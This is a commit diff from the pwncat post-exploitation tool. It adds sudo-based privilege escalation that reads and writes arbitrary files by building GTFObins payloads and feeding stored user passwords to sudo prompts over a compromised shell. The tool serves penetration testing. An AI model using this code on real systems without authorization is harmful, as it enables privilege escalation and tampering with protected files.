mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-24 01:25:37 +01:00
Added functionality to read and write files with sudo!
This commit is contained in:
parent
b6a926033d
commit
ba359c024d
@ -213,28 +213,34 @@ class Binary:
|
||||
exit,
|
||||
)
|
||||
|
||||
def read_file(self, file_path: str) -> str:
|
||||
def read_file(self, file_path: str, sudo_prefix: str = None) -> str:
|
||||
""" Build a payload which will leak the contents of the specified file.
|
||||
"""
|
||||
|
||||
if "read_file" not in self.data:
|
||||
return None
|
||||
|
||||
return self.data["read_file"].format(
|
||||
path=quote(self.path), lfile=quote(file_path)
|
||||
)
|
||||
path = quote(self.path)
|
||||
if sudo_prefix:
|
||||
path = sudo_prefix + " " + path
|
||||
|
||||
return self.data["read_file"].format(path=path, lfile=quote(file_path))
|
||||
|
||||
@property
|
||||
def has_read_file(self):
|
||||
""" Check if this binary has a read_file capability """
|
||||
return "read_file" in self.data
|
||||
|
||||
def write_file(self, file_path: str, data: bytes) -> str:
|
||||
def write_file(self, file_path: str, data: bytes, sudo_prefix: str = None) -> str:
|
||||
""" Build a payload to write the specified data into the file """
|
||||
|
||||
if "write_file" not in self.data:
|
||||
return None
|
||||
|
||||
path = quote(self.path)
|
||||
if sudo_prefix:
|
||||
path = sudo_prefix + " " + path
|
||||
|
||||
if isinstance(data, str):
|
||||
data = data.encode("utf-8")
|
||||
|
||||
@ -248,9 +254,7 @@ class Binary:
|
||||
)
|
||||
|
||||
return self.data["write_file"]["payload"].format(
|
||||
path=quote(self.path),
|
||||
lfile=quote(file_path),
|
||||
data=quote(data.decode("utf-8")),
|
||||
path=path, lfile=quote(file_path), data=quote(data.decode("utf-8")),
|
||||
)
|
||||
|
||||
@property
|
||||
@ -321,40 +325,50 @@ class Binary:
|
||||
return binary
|
||||
|
||||
@classmethod
|
||||
def find_sudo(cls, spec: str, get_binary_path: Callable[[str], str]) -> "Binary":
|
||||
def find_sudo(
|
||||
cls, spec: str, get_binary_path: Callable[[str], str], capability: int
|
||||
) -> "Binary":
|
||||
""" Locate a GTFObin binary for the given sudo spec. This will separate
|
||||
out the path of the binary from spec, and use `find` to locate a Binary
|
||||
object. If that binary cannot be used with this spec or no binary exists,
|
||||
SudoNotPossible is raised. shell_path is used as the default for specs
|
||||
which specify "ALL". """
|
||||
|
||||
binaries = []
|
||||
|
||||
if spec == "ALL":
|
||||
# If the spec specifies any command, we check each known gtfobins
|
||||
# binary for one usable w/ this sudo spec. We use recursion here,
|
||||
# but never more than a depth of one, so it should be safe.
|
||||
for data in cls._binaries:
|
||||
# Resolve the binary path from the name
|
||||
path = get_binary_path(data["name"])
|
||||
found_caps = 0
|
||||
|
||||
# This binary doens't exist on the system
|
||||
if path is None:
|
||||
continue
|
||||
while found_caps != capability:
|
||||
|
||||
try:
|
||||
# Recurse using the path as the new spec (won't recurse
|
||||
# again since spec is now a full path)
|
||||
return cls.find_sudo(path, get_binary_path)
|
||||
except SudoNotPossible:
|
||||
pass
|
||||
raise SudoNotPossible("no available gtfobins for ALL")
|
||||
binary = cls.find_capability(
|
||||
get_binary_path, (capability & ~found_caps)
|
||||
)
|
||||
|
||||
path = shlex.split(spec)[0]
|
||||
binary = cls.find(path)
|
||||
if binary is None:
|
||||
# raise SudoNotPossible("no available gtfobins for ALL")
|
||||
break
|
||||
|
||||
if binary is None:
|
||||
binaries.append(binary)
|
||||
found_caps |= binary.capabilities
|
||||
|
||||
else:
|
||||
path = shlex.split(spec)[0]
|
||||
binary = cls.find(path)
|
||||
if binary is not None:
|
||||
found_caps = binary.capabilities & capability
|
||||
binaries = [binary]
|
||||
|
||||
if len(binaries) == 0 or found_caps == 0:
|
||||
raise SudoNotPossible(f"no available gtfobins for {spec}")
|
||||
|
||||
# This will throw an exception if we can't sudo with this binary
|
||||
_ = binary.can_sudo(spec, "")
|
||||
# for
|
||||
|
||||
return spec, binary
|
||||
# This will throw an exception if we can't sudo with this binary
|
||||
# _ = binary.can_sudo(spec, "")
|
||||
|
||||
# return spec, binary
|
||||
return binaries
|
||||
|
@ -16,7 +16,8 @@ class Capability:
|
||||
READ = 1
|
||||
WRITE = 2
|
||||
SHELL = 4
|
||||
SUDO = 8
|
||||
SUDO = SHELL
|
||||
last = 8
|
||||
ALL = READ | WRITE | SHELL | SUDO
|
||||
|
||||
|
||||
|
@ -130,6 +130,9 @@ class SetuidMethod(Method):
|
||||
return read_pipe
|
||||
|
||||
def write_file(self, filepath: str, data: bytes, technique: Technique):
|
||||
info(
|
||||
f"attempting to write {Fore.BLUE}{filepath}{Fore.RESET} with {Fore.RED}{self.get_name(technique)}{Fore.RESET}"
|
||||
)
|
||||
|
||||
binary = technique.ident
|
||||
payload = binary.write_file(filepath, data)
|
||||
|
@ -5,10 +5,13 @@ import sys
|
||||
from time import sleep
|
||||
import os
|
||||
from colorama import Fore, Style
|
||||
from io import StringIO
|
||||
import socket
|
||||
from io import StringIO, BytesIO
|
||||
import functools
|
||||
|
||||
from pwncat.util import info, success, error, progress, warn, CTRL_C
|
||||
from pwncat.privesc.base import Method, PrivescError, Technique
|
||||
from pwncat.file import RemoteBinaryPipe
|
||||
|
||||
from pwncat.pysudoers import Sudoers
|
||||
from pwncat import gtfobins
|
||||
@ -23,14 +26,9 @@ class SudoMethod(Method):
|
||||
def __init__(self, pty: "pwncat.pty.PtyHandler"):
|
||||
super(SudoMethod, self).__init__(pty)
|
||||
|
||||
def find_sudo(self):
|
||||
def send_password(self, current_user):
|
||||
|
||||
current_user = self.pty.current_user
|
||||
|
||||
# Process the prompt but it will not wait for the end of the output
|
||||
# delim = self.pty.process("sudo -l", delim=True)
|
||||
delim = self.pty.process("sudo -p 'Password: ' -l", delim=True)
|
||||
output = self.pty.client.recv(6).lower()
|
||||
output = self.pty.client.recv(6, socket.MSG_PEEK).lower()
|
||||
|
||||
if output == b"[sudo]" or output == b"passwo":
|
||||
info("sudo is asking for a password", overlay=True)
|
||||
@ -43,50 +41,51 @@ class SudoMethod(Method):
|
||||
raise PrivescError(
|
||||
f"user {Fore.GREEN}{current_user['name']}{Fore.RESET} has no known password"
|
||||
)
|
||||
else:
|
||||
return # it did not ask for a password, continue as usual
|
||||
|
||||
# Reset the timeout to allow for sudo to pause
|
||||
old_timeout = self.pty.client.gettimeout()
|
||||
self.pty.client.settimeout(5)
|
||||
self.pty.client.send(current_user["password"].encode("utf-8") + b"\n")
|
||||
# Reset the timeout to allow for sudo to pause
|
||||
old_timeout = self.pty.client.gettimeout()
|
||||
self.pty.client.settimeout(5)
|
||||
self.pty.client.send(current_user["password"].encode("utf-8") + b"\n")
|
||||
|
||||
# Flush the rest of the password prompt
|
||||
self.pty.recvuntil("\n")
|
||||
# Flush the rest of the password prompt
|
||||
self.pty.recvuntil("\n")
|
||||
|
||||
# Check the output once more
|
||||
output = self.pty.client.recv(6).lower()
|
||||
# Check the output once more
|
||||
output = self.pty.client.recv(6, socket.MSG_PEEK).lower()
|
||||
|
||||
# Reset the timeout to the originl value
|
||||
self.pty.client.settimeout(old_timeout)
|
||||
# Reset the timeout to the originl value
|
||||
self.pty.client.settimeout(old_timeout)
|
||||
|
||||
if (
|
||||
output == b"[sudo]"
|
||||
or output == b"passwo"
|
||||
or output == b"sorry,"
|
||||
or output == b"sudo: "
|
||||
):
|
||||
self.pty.client.send(CTRL_C) # break out of password prompt
|
||||
if (
|
||||
output == b"[sudo]"
|
||||
or output == b"passwo"
|
||||
or output == b"sorry,"
|
||||
or output == b"sudo: "
|
||||
):
|
||||
self.pty.client.send(CTRL_C) # break out of password prompt
|
||||
|
||||
# Handle the edge case sudo telling us something
|
||||
if output == b"sorry,":
|
||||
# Check if this user cannot run sudo
|
||||
sudo_response = self.pty.recvuntil("\n").lower()
|
||||
# Flush all the output
|
||||
self.pty.recvuntil(b"\n")
|
||||
raise PrivescError(
|
||||
f"user {Fore.GREEN}{current_user['name']}{Fore.RESET} could not sudo"
|
||||
)
|
||||
|
||||
if b"may not run sudo" in sudo_response:
|
||||
return
|
||||
|
||||
# Flush all the output
|
||||
self.pty.recvuntil(delim)
|
||||
raise PrivescError(
|
||||
f"user {Fore.GREEN}{current_user['name']}{Fore.RESET} may not run sudo"
|
||||
)
|
||||
def find_sudo(self):
|
||||
|
||||
# Flush all the output
|
||||
self.pty.recvuntil(delim)
|
||||
raise PrivescError(
|
||||
f"user {Fore.GREEN}{current_user['name']}{Fore.RESET} seemingly has an incorrect password"
|
||||
)
|
||||
current_user = self.pty.current_user
|
||||
|
||||
# Process the prompt but it will not wait for the end of the output
|
||||
# delim = self.pty.process("sudo -l", delim=True)
|
||||
delim = self.pty.process("sudo -p 'Password: ' -l", delim=True)
|
||||
|
||||
self.send_password(current_user)
|
||||
|
||||
# Get the sudo -l output
|
||||
output = self.pty.recvuntil(delim).split(delim)[0].strip()
|
||||
|
||||
sudo_output_lines = output.split(b"\n")
|
||||
|
||||
# Determine the starting line of the valuable sudo input
|
||||
@ -188,38 +187,41 @@ class SudoMethod(Method):
|
||||
# The PtyHandler.which method is used to verify the presence of
|
||||
# different GTFObins on the remote system when an "ALL" spec is
|
||||
# found.
|
||||
sudo_privesc["command"], binary = gtfobins.Binary.find_sudo(
|
||||
sudo_privesc["command"], self.pty.which
|
||||
# sudo_privesc["command"], binary = gtfobins.Binary.find_sudo(
|
||||
# sudo_privesc["command"], self.pty.which
|
||||
# )
|
||||
binaries = gtfobins.Binary.find_sudo(
|
||||
sudo_privesc["command"], self.pty.which, capability
|
||||
)
|
||||
except gtfobins.SudoNotPossible:
|
||||
# No GTFObins possible with this sudo spec
|
||||
continue
|
||||
|
||||
# If this binary cannot sudo, don't bother with it
|
||||
if not (binary.capabilities & Capability.SUDO):
|
||||
continue
|
||||
|
||||
if sudo_privesc["run_as_user"] == "ALL":
|
||||
# add a technique for root
|
||||
techniques.append(
|
||||
Technique(
|
||||
"root",
|
||||
self,
|
||||
(binary, sudo_privesc["command"], sudo_privesc["password"]),
|
||||
binary.capabilities,
|
||||
)
|
||||
)
|
||||
else:
|
||||
users = sudo_privesc["run_as_user"].split(",")
|
||||
for u in users:
|
||||
for binary in binaries:
|
||||
command = sudo_privesc["command"]
|
||||
if command == "ALL":
|
||||
command = binary.path
|
||||
if sudo_privesc["run_as_user"] == "ALL":
|
||||
# add a technique for root
|
||||
techniques.append(
|
||||
Technique(
|
||||
u,
|
||||
"root",
|
||||
self,
|
||||
(binary, sudo_privesc["command"], sudo_privesc["password"]),
|
||||
(binary, command, sudo_privesc["password"]),
|
||||
binary.capabilities,
|
||||
)
|
||||
)
|
||||
else:
|
||||
users = sudo_privesc["run_as_user"].split(",")
|
||||
for u in users:
|
||||
techniques.append(
|
||||
Technique(
|
||||
u,
|
||||
self,
|
||||
(binary, command, sudo_privesc["password"],),
|
||||
binary.capabilities,
|
||||
)
|
||||
)
|
||||
|
||||
return techniques
|
||||
|
||||
@ -271,3 +273,36 @@ class SudoMethod(Method):
|
||||
self.pty.run(exit, wait=False) # here be dragons
|
||||
|
||||
raise PrivescError("failed to privesc")
|
||||
|
||||
def read_file(self, filepath: str, technique: Technique) -> RemoteBinaryPipe:
|
||||
|
||||
info(
|
||||
f"attempting to read {Fore.BLUE}{filepath}{Fore.RESET} with {Fore.RED}{self.get_name(technique)}{Fore.RESET}"
|
||||
)
|
||||
binary, sudo_spec, password_required = technique.ident
|
||||
|
||||
read_payload = binary.read_file(
|
||||
filepath, sudo_prefix=f"sudo -u {shlex.quote(technique.user)}"
|
||||
)
|
||||
|
||||
read_pipe = self.pty.run(
|
||||
read_payload,
|
||||
input=functools.partial(self.send_password, self.pty.current_user),
|
||||
)
|
||||
|
||||
return BytesIO(read_pipe)
|
||||
|
||||
def write_file(self, filepath: str, data: bytes, technique: Technique):
|
||||
|
||||
info(
|
||||
f"attempting to write {Fore.BLUE}{filepath}{Fore.RESET} with {Fore.RED}{self.get_name(technique)}{Fore.RESET}"
|
||||
)
|
||||
binary, sudo_spec, password_required = technique.ident
|
||||
payload = binary.write_file(
|
||||
filepath, data, sudo_prefix=f"sudo -u {shlex.quote(technique.user)}"
|
||||
)
|
||||
|
||||
# Run the commands
|
||||
self.pty.run(
|
||||
payload, input=functools.partial(self.send_password, self.pty.current_user),
|
||||
)
|
||||
|
@ -470,7 +470,11 @@ class PtyHandler:
|
||||
self.run(line[1:], wait=False)
|
||||
continue
|
||||
|
||||
argv = shlex.split(line)
|
||||
try:
|
||||
argv = shlex.split(line)
|
||||
except ValueError as e:
|
||||
util.error(e.args[0])
|
||||
continue
|
||||
|
||||
# Empty command
|
||||
if len(argv) == 0:
|
||||
@ -781,7 +785,7 @@ class PtyHandler:
|
||||
self.reset()
|
||||
self.do_sync([])
|
||||
|
||||
def run(self, cmd, wait=True) -> bytes:
|
||||
def run(self, cmd, wait=True, input: bytes = b"") -> bytes:
|
||||
""" Run a command in the context of the remote host and return the
|
||||
output. This is run synchrounously.
|
||||
|
||||
@ -790,6 +794,10 @@ class PtyHandler:
|
||||
"""
|
||||
|
||||
response = self.process(cmd, delim=wait)
|
||||
if callable(input):
|
||||
input()
|
||||
else:
|
||||
self.client.send(input)
|
||||
|
||||
if wait:
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user